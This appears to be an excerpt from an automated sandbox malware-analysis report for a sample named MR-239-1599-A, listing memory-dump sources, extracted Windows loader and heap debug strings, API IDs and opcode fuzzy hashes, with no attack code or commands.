                                                                                                                                                                                                          • Source File: 00000003.00000002.1946410833.00000000014C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014C0000, based on PE: true
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_3_2_14c0000_MR-239-1599-A.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@$InitializeThunk
                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                          Strings
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000003.00000002.1946410833.00000000014C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014C0000, based on PE: true
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_3_2_14c0000_MR-239-1599-A.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                          • String ID: 6$8$LdrResFallbackLangList Enter$LdrResFallbackLangList Exit
                                                                                                                                                                                                          Strings
                                                                                                                                                                                                          • LdrpInitializeProcess, xrefs: 01528422
                                                                                                                                                                                                          • minkernel\ntdll\ldrinit.c, xrefs: 01528421
                                                                                                                                                                                                          • @, xrefs: 01528591
                                                                                                                                                                                                          • \Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers, xrefs: 0152855E
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000003.00000002.1946410833.00000000014C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014C0000, based on PE: true
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_3_2_14c0000_MR-239-1599-A.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                          • String ID: @$LdrpInitializeProcess$\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers$minkernel\ntdll\ldrinit.c
                                                                                                                                                                                                          Strings
                                                                                                                                                                                                          • RtlpGetActivationContextDataStorageMapAndRosterHeader, xrefs: 015621D9, 015622B1
                                                                                                                                                                                                          • SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: Peb : %pSXS: ActivationContextData: %pSXS: AssemblyStorageMap : %p, xrefs: 015622B6
                                                                                                                                                                                                          • .Local, xrefs: 015228D8
                                                                                                                                                                                                          • SXS: %s() passed the empty activation context, xrefs: 015621DE
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000003.00000002.1946410833.00000000014C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014C0000, based on PE: true
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_3_2_14c0000_MR-239-1599-A.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                          • String ID: .Local$RtlpGetActivationContextDataStorageMapAndRosterHeader$SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: Peb : %pSXS: ActivationContextData: %pSXS: AssemblyStorageMap : %p$SXS: %s() passed the empty activation context
                                                                                                                                                                                                          Strings
                                                                                                                                                                                                          • SXS: %s() called with invalid cookie type 0x%08Ix, xrefs: 01563437
                                                                                                                                                                                                          • SXS: %s() called with invalid cookie tid 0x%08Ix - should be %08Ix, xrefs: 01563456
                                                                                                                                                                                                          • RtlDeactivateActivationContext, xrefs: 01563425, 01563432, 01563451
                                                                                                                                                                                                          • SXS: %s() called with invalid flags 0x%08lx, xrefs: 0156342A
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000003.00000002.1946410833.00000000014C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014C0000, based on PE: true
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_3_2_14c0000_MR-239-1599-A.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                          • String ID: RtlDeactivateActivationContext$SXS: %s() called with invalid cookie tid 0x%08Ix - should be %08Ix$SXS: %s() called with invalid cookie type 0x%08Ix$SXS: %s() called with invalid flags 0x%08lx
                                                                                                                                                                                                          Strings
                                                                                                                                                                                                          • ThreadPool: callback %p(%p) returned with a transaction uncleared, xrefs: 01550FE5
                                                                                                                                                                                                          • ThreadPool: callback %p(%p) returned with background priorities set, xrefs: 015510AE
                                                                                                                                                                                                          • ThreadPool: callback %p(%p) returned with the loader lock held, xrefs: 01551028
                                                                                                                                                                                                          • ThreadPool: callback %p(%p) returned with preferred languages set, xrefs: 0155106B
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000003.00000002.1946410833.00000000014C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014C0000, based on PE: true
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_3_2_14c0000_MR-239-1599-A.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                          • String ID: ThreadPool: callback %p(%p) returned with a transaction uncleared$ThreadPool: callback %p(%p) returned with background priorities set$ThreadPool: callback %p(%p) returned with preferred languages set$ThreadPool: callback %p(%p) returned with the loader lock held
                                                                                                                                                                                                          • API String ID: 0-1468400865
                                                                                                                                                                                                          Strings
                                                                                                                                                                                                          • apphelp.dll, xrefs: 01512462
                                                                                                                                                                                                          • minkernel\ntdll\ldrinit.c, xrefs: 0155A9A2
                                                                                                                                                                                                          • Getting ApphelpCheckModule failed with status 0x%08lx, xrefs: 0155A992
                                                                                                                                                                                                          • LdrpDynamicShimModule, xrefs: 0155A998
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000003.00000002.1946410833.00000000014C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014C0000, based on PE: true
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_3_2_14c0000_MR-239-1599-A.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                          • String ID: Getting ApphelpCheckModule failed with status 0x%08lx$LdrpDynamicShimModule$apphelp.dll$minkernel\ntdll\ldrinit.c
                                                                                                                                                                                                          • API String ID: 0-176724104
                                                                                                                                                                                                          Strings
                                                                                                                                                                                                          • HEAP[%wZ]: , xrefs: 01503255
                                                                                                                                                                                                          • HEAP: , xrefs: 01503264
                                                                                                                                                                                                          • Unable to release memory at %p for %Ix bytes - Status == %x, xrefs: 0150327D
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000003.00000002.1946410833.00000000014C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014C0000, based on PE: true
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_3_2_14c0000_MR-239-1599-A.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                          • String ID: HEAP: $HEAP[%wZ]: $Unable to release memory at %p for %Ix bytes - Status == %x
                                                                                                                                                                                                          • API String ID: 0-617086771
                                                                                                                                                                                                          Strings
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000003.00000002.1946410833.00000000014C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014C0000, based on PE: true
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_3_2_14c0000_MR-239-1599-A.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                          • String ID: (UCRBlock->Size >= *Size)$HEAP: $HEAP[%wZ]:
                                                                                                                                                                                                          • API String ID: 0-4253913091
                                                                                                                                                                                                          Strings
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000003.00000002.1946410833.00000000014C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014C0000, based on PE: true
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_3_2_14c0000_MR-239-1599-A.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                          • String ID: $@
                                                                                                                                                                                                          • API String ID: 0-1077428164
                                                                                                                                                                                                          Strings
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000003.00000002.1946410833.00000000014C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014C0000, based on PE: true
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_3_2_14c0000_MR-239-1599-A.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                          • String ID: FilterFullPath$UseFilter$\??\
                                                                                                                                                                                                          • API String ID: 0-2779062949
                                                                                                                                                                                                          Strings
                                                                                                                                                                                                          • minkernel\ntdll\ldrinit.c, xrefs: 0155A121
                                                                                                                                                                                                          • LdrpCheckModule, xrefs: 0155A117
                                                                                                                                                                                                          • Failed to allocated memory for shimmed module list, xrefs: 0155A10F
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000003.00000002.1946410833.00000000014C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014C0000, based on PE: true
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_3_2_14c0000_MR-239-1599-A.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                          • String ID: Failed to allocated memory for shimmed module list$LdrpCheckModule$minkernel\ntdll\ldrinit.c
                                                                                                                                                                                                          • API String ID: 0-161242083
                                                                                                                                                                                                          Strings
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000003.00000002.1946410833.00000000014C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014C0000, based on PE: true
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_3_2_14c0000_MR-239-1599-A.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                          • String ID: ((PHEAP_ENTRY)LastKnownEntry <= Entry)$HEAP: $HEAP[%wZ]:
                                                                                                                                                                                                          • API String ID: 0-1334570610
                                                                                                                                                                                                          Strings
                                                                                                                                                                                                          • LdrpInitializePerUserWindowsDirectory, xrefs: 015682DE
                                                                                                                                                                                                          • minkernel\ntdll\ldrinit.c, xrefs: 015682E8
                                                                                                                                                                                                          • Failed to reallocate the system dirs string !, xrefs: 015682D7
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000003.00000002.1946410833.00000000014C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014C0000, based on PE: true
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_3_2_14c0000_MR-239-1599-A.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                          • String ID: Failed to reallocate the system dirs string !$LdrpInitializePerUserWindowsDirectory$minkernel\ntdll\ldrinit.c
                                                                                                                                                                                                          • API String ID: 0-1783798831
                                                                                                                                                                                                          Strings
                                                                                                                                                                                                          • PreferredUILanguages, xrefs: 015AC212
                                                                                                                                                                                                          • @, xrefs: 015AC1F1
                                                                                                                                                                                                          • \Registry\Machine\System\CurrentControlSet\Control\MUI\Settings, xrefs: 015AC1C5
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000003.00000002.1946410833.00000000014C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014C0000, based on PE: true
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_3_2_14c0000_MR-239-1599-A.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                          • String ID: @$PreferredUILanguages$\Registry\Machine\System\CurrentControlSet\Control\MUI\Settings
                                                                                                                                                                                                          • API String ID: 0-2968386058
                                                                                                                                                                                                          Strings
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000003.00000002.1946410833.00000000014C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014C0000, based on PE: true
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_3_2_14c0000_MR-239-1599-A.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                          • String ID: @$LdrpResValidateFilePath Enter$LdrpResValidateFilePath Exit
                                                                                                                                                                                                          • API String ID: 0-1373925480
                                                                                                                                                                                                          Strings
                                                                                                                                                                                                          • Import Redirection: %wZ %wZ!%s redirected to %wZ, xrefs: 01574888
                                                                                                                                                                                                          • LdrpCheckRedirection, xrefs: 0157488F
                                                                                                                                                                                                          • minkernel\ntdll\ldrredirect.c, xrefs: 01574899
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000003.00000002.1946410833.00000000014C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014C0000, based on PE: true
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_3_2_14c0000_MR-239-1599-A.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                          • String ID: Import Redirection: %wZ %wZ!%s redirected to %wZ$LdrpCheckRedirection$minkernel\ntdll\ldrredirect.c
                                                                                                                                                                                                          • API String ID: 0-3154609507
                                                                                                                                                                                                          Strings
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000003.00000002.1946410833.00000000014C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014C0000, based on PE: true
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_3_2_14c0000_MR-239-1599-A.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                          • String ID: (ROUND_UP_TO_POWER2(Size, PAGE_SIZE) == Size)$HEAP: $HEAP[%wZ]:
                                                                                                                                                                                                          • API String ID: 0-2558761708
                                                                                                                                                                                                          Strings
                                                                                                                                                                                                          • Process initialization failed with status 0x%08lx, xrefs: 015720F3
                                                                                                                                                                                                          • minkernel\ntdll\ldrinit.c, xrefs: 01572104
                                                                                                                                                                                                          • LdrpInitializationFailure, xrefs: 015720FA
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000003.00000002.1946410833.00000000014C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014C0000, based on PE: true
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_3_2_14c0000_MR-239-1599-A.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                          • String ID: LdrpInitializationFailure$Process initialization failed with status 0x%08lx$minkernel\ntdll\ldrinit.c
                                                                                                                                                                                                          • API String ID: 0-2986994758
                                                                                                                                                                                                          APIs
                                                                                                                                                                                                          Strings
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000003.00000002.1946410833.00000000014C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014C0000, based on PE: true
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_3_2_14c0000_MR-239-1599-A.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: ___swprintf_l
                                                                                                                                                                                                          • String ID: #%u
                                                                                                                                                                                                          • API String ID: 48624451-232158463
                                                                                                                                                                                                          Strings
                                                                                                                                                                                                          • LdrResSearchResource Exit, xrefs: 014FAA25
                                                                                                                                                                                                          • LdrResSearchResource Enter, xrefs: 014FAA13
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000003.00000002.1946410833.00000000014C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014C0000, based on PE: true
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_3_2_14c0000_MR-239-1599-A.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                          • String ID: LdrResSearchResource Enter$LdrResSearchResource Exit
                                                                                                                                                                                                          • API String ID: 0-4066393604
                                                                                                                                                                                                          Strings
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000003.00000002.1946410833.00000000014C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014C0000, based on PE: true
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_3_2_14c0000_MR-239-1599-A.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                          • String ID: `$`
                                                                                                                                                                                                          • API String ID: 0-197956300
                                                                                                                                                                                                          Strings
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000003.00000002.1946410833.00000000014C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014C0000, based on PE: true
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_3_2_14c0000_MR-239-1599-A.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: InitializeThunk
                                                                                                                                                                                                          • String ID: Legacy$UEFI
                                                                                                                                                                                                          • API String ID: 2994545307-634100481
                                                                                                                                                                                                          Strings
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000003.00000002.1946410833.00000000014C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014C0000, based on PE: true
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_3_2_14c0000_MR-239-1599-A.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                          • String ID: @$MUI
                                                                                                                                                                                                          • API String ID: 0-17815947
                                                                                                                                                                                                          Strings
                                                                                                                                                                                                          • kLsE, xrefs: 014F0540
                                                                                                                                                                                                          • TerminalServices-RemoteConnectionManager-AllowAppServerMode, xrefs: 014F063D
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000003.00000002.1946410833.00000000014C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014C0000, based on PE: true
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_3_2_14c0000_MR-239-1599-A.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                          • String ID: TerminalServices-RemoteConnectionManager-AllowAppServerMode$kLsE
                                                                                                                                                                                                          • API String ID: 0-2547482624
                                                                                                                                                                                                          Strings
                                                                                                                                                                                                          • RtlpResUltimateFallbackInfo Enter, xrefs: 014FA2FB
                                                                                                                                                                                                          • RtlpResUltimateFallbackInfo Exit, xrefs: 014FA309
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000003.00000002.1946410833.00000000014C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014C0000, based on PE: true
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_3_2_14c0000_MR-239-1599-A.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                          • String ID: RtlpResUltimateFallbackInfo Enter$RtlpResUltimateFallbackInfo Exit
                                                                                                                                                                                                          • API String ID: 0-2876891731
                                                                                                                                                                                                          Strings
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000003.00000002.1946410833.00000000014C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014C0000, based on PE: true
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_3_2_14c0000_MR-239-1599-A.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: InitializeThunk
                                                                                                                                                                                                          • String ID: Cleanup Group$Threadpool!
                                                                                                                                                                                                          • API String ID: 2994545307-4008356553
                                                                                                                                                                                                          Strings
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000003.00000002.1946410833.00000000014C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014C0000, based on PE: true
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_3_2_14c0000_MR-239-1599-A.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                          • String ID: MUI
                                                                                                                                                                                                          • API String ID: 0-1339004836
                                                                                                                                                                                                          Strings
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000003.00000002.1946410833.00000000014C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014C0000, based on PE: true
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_3_2_14c0000_MR-239-1599-A.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                          • API String ID: 0-3916222277
                                                                                                                                                                                                          Strings
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000003.00000002.1946410833.00000000014C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014C0000, based on PE: true
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_3_2_14c0000_MR-239-1599-A.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                          • API String ID: 0-3916222277
                                                                                                                                                                                                          Strings
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000003.00000002.1946410833.00000000014C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014C0000, based on PE: true
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_3_2_14c0000_MR-239-1599-A.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                          • String ID: GlobalTags
                                                                                                                                                                                                          • API String ID: 0-1106856819
                                                                                                                                                                                                          Strings
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000003.00000002.1946410833.00000000014C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014C0000, based on PE: true
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_3_2_14c0000_MR-239-1599-A.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                          • String ID: .mui
                                                                                                                                                                                                          • API String ID: 0-1199573805
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                          • String ID: EXT-
                                                                                                                                                                                                          • API String ID: 0-1948896318
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                          • String ID: BinaryHash
                                                                                                                                                                                                          • API String ID: 0-2202222882
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                          • String ID: #
                                                                                                                                                                                                          • API String ID: 0-1885708031
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                          • String ID: BinaryName
                                                                                                                                                                                                          • API String ID: 0-215506332
                                                                                                                                                                                                          Strings
                                                                                                                                                                                                          • AVRF: AVrfDllUnloadNotification called for a provider (%p) , xrefs: 0157895E
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                          • String ID: AVRF: AVrfDllUnloadNotification called for a provider (%p)
                                                                                                                                                                                                          • API String ID: 0-702105204
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000003.00000002.1946410833.00000000014C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014C0000, based on PE: true
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_3_2_14c0000_MR-239-1599-A.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                          • Opcode ID: e8a3620866af67e9ba5ee0a5ffcffd4608486dc740fad13053f627f14a392904
                                                                                                                                                                                                          • Instruction ID: 6f4b88b1c271289f885205fe001c81d645ae1a421127a410ef8be76f6134ee1a
                                                                                                                                                                                                          • Opcode Fuzzy Hash: e8a3620866af67e9ba5ee0a5ffcffd4608486dc740fad13053f627f14a392904
                                                                                                                                                                                                          • Instruction Fuzzy Hash: AFF18171E0021A9BEF16CFA9C594BAEBBF6BF44714F049529E901AF344E734D841CB60
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000003.00000002.1946410833.00000000014C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014C0000, based on PE: true
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_3_2_14c0000_MR-239-1599-A.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                          • Opcode ID: 5fc779675aa6edeeb2560ae275e0b6773c8e69e04b153c43e9554cbf6df6a5ed
                                                                                                                                                                                                          • Instruction ID: 8b3c7ac85bd7c0ef7cdaefa319f6676327545bdecbf2436ecc1f1453434b9002
                                                                                                                                                                                                          • Opcode Fuzzy Hash: 5fc779675aa6edeeb2560ae275e0b6773c8e69e04b153c43e9554cbf6df6a5ed
                                                                                                                                                                                                          • Instruction Fuzzy Hash: 63D1F071A0060A8BDF15DFA8C841AFEB7F1FF88314F988169D955BB281E735E905CB60
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000003.00000002.1946410833.00000000014C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014C0000, based on PE: true
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_3_2_14c0000_MR-239-1599-A.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                          • Opcode ID: ac29048a768108c11df6fe52f08d1f6871a5472744f804d5a4681989ad85a257
                                                                                                                                                                                                          • Instruction ID: b7ff00d34bc00e94bf7f2a2156934f2cb66b8b1cb14406864687db7be6c4a176
                                                                                                                                                                                                          • Opcode Fuzzy Hash: ac29048a768108c11df6fe52f08d1f6871a5472744f804d5a4681989ad85a257
                                                                                                                                                                                                          • Instruction Fuzzy Hash: 8CE19071508342CFC715CF28C490A6BBBE1FF89314F06896EEA998B361D731E905CB92
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000003.00000002.1946410833.00000000014C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014C0000, based on PE: true
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_3_2_14c0000_MR-239-1599-A.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                          • Opcode ID: 55948ecdde777a8b59fe89fec5eefe1e741ca7216864baffaca80ce28ac9d0c3
                                                                                                                                                                                                          • Instruction ID: 3aad7c09e899679fb4993cf36b1fd4347783e124e0e57bfbf611a31911113cf5
                                                                                                                                                                                                          • Opcode Fuzzy Hash: 55948ecdde777a8b59fe89fec5eefe1e741ca7216864baffaca80ce28ac9d0c3
                                                                                                                                                                                                          • Instruction Fuzzy Hash: D8D1CF71A002079BDF14DF69C884ABEB7E5FF64209F15462EE916DB2A0FB30D951CB60
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000003.00000002.1946410833.00000000014C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014C0000, based on PE: true
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_3_2_14c0000_MR-239-1599-A.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                          • Opcode ID: c58da6bef63a17e65f3132630e1fabe04f2e2fb92a18dec9866503995c4710af
                                                                                                                                                                                                          • Instruction ID: 13af8ed064fd20a2dc26b574a1b12e5d190d18917c3a14dfa192d7265c560d7a
                                                                                                                                                                                                          • Opcode Fuzzy Hash: c58da6bef63a17e65f3132630e1fabe04f2e2fb92a18dec9866503995c4710af
